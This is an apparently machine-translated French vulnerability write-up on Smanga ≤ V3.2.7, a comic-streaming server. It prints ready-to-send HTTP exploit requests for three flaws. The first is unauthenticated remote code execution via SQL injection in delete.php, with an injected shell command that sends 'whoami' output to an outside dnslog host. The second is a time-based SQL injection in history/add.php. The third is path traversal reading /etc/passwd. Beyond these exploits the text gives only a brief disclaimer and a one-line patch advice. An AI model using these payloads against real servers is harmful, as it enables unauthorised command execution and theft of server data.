Annuaire d'articles
Préface
Smanga présente une vulnérabilité d'exécution de code à distance non autorisée qui permet à un attaquant d'exécuter des commandes arbitraires sur l'hôte cible et d'obtenir les autorisations du serveur.
déclaration
Veuillez ne pas utiliser les technologies pertinentes dans cet article pour vous livrer à des tests illégaux. Toutes les conséquences et pertes directes ou indirectes causées par la diffusion et l'utilisation des informations ou des outils fournis dans cet article sont de la responsabilité de l'utilisateur lui-même. Toutes les conséquences néfastes et L'auteur de l'article n'a aucune importance. Cet article est uniquement à des fins éducatives.
1. Présentation du produit
Aucune configuration requise, un outil de lecture de médias en streaming de bandes dessinées directement installé dans Docker. Inspiré d'emby plex, un lecteur de bandes dessinées développé pour répondre aux besoins de lecture de bandes dessinées. Pour déployer le panneau d'environnement d'installation smanga dans l'environnement Windows, installez d'abord le petit panneau en cuir, téléchargez le projet smanga, importez la base de données, connectez-vous à smanga et déployez smanga dans Windows.
1. Description de la vulnérabilité
Il existe une vulnérabilité d'exécution de code à distance non autorisée dans l'interface /php/manga/delete.php. Un attaquant peut exécuter des commandes arbitraires sur l'hôte cible et obtenir les autorisations du serveur.
2. Niveau de vulnérabilité
- risque élevé
3. Portée de l'influence
- Smanga ≤ V3.2.7
4. Récurrence des vulnérabilités
Pour l'environnement construction, veuillez vous référer au lien : https://www.bilibili.com/read/cv21910784/
L'interface du système est la suivante
EXP :
POST /php/manga/delete.php HTTP/1.1
Host: XX.XX.XX.XX:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
If-None-Match: "63ff3602-c6d"
If-Modified-Since: Wed, 01 Mar 2023 11:24:50 GMT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 360
mangaId=1+union+select+*+from+%28select+1%29a+join+%28select+2%29b+join+%28select+3%29c+join+%28select+4%29d+join+%28select+%27%5C%22%3Bping+-c+3+%60whoami%60.zm16pf.dnslog.cn%3B%5C%22%27%29e+join+%28select+6%29f+join+%28select+7%29g+join+%28select+8%29h+join+%28select+9%29i+join+%28select+10%29j+join+%28select+11%29k+join+%28select+12%29l%3B&deleteFile=true
5. Suggestions de réparation
Le patch officiel a été publié, veuillez le mettre à jour.
6. Vulnérabilités supplémentaires
Vulnérabilité 1. Injection SQL
Description de la vulnérabilité :
/php/history/add.phpIl existe une vulnérabilité d'injection SQL qui peut obtenir des informations sensibles.
Version concernée
- smanga ≤ V3.2.7
exploiter
PDC :
POST /php/history/add.php HTTP/1.1
Host: XX.XX.XX.XX:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
Cookie: thinkphp_show_page_trace=0|0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 196
chapterCover=1&chapterId=1&chapterName=1&chatpterPath=1&chaptertype=image&keyword=1&mangaCover=undefined&mangaId=1&mangaName=&mediaId=if(now()=sysdate()%2Csleep(5)%2C0)×tamp=12123123&userId=1
Vulnérabilité 2. Lecture arbitraire de fichiers
Le paramètre de fichier dans l'
/php/get-file-flow.phpinterface de description de la vulnérabilité n'est pas filtré et il y a une traversée de chemin, provoquant une vulnérabilité de lecture de fichier arbitraire. Des attaquants non autorisés peuvent lire le fichier de configuration.
Version concernée
- smanga ≤ V3.2.7
Exploiter
le POC :
POST /php/get-file-flow.php HTTP/1.1
Host: XX.XX.XX.XX:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
Cookie: thinkphp_show_page_trace=0|0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
file=../../../../../../../../etc/passwd
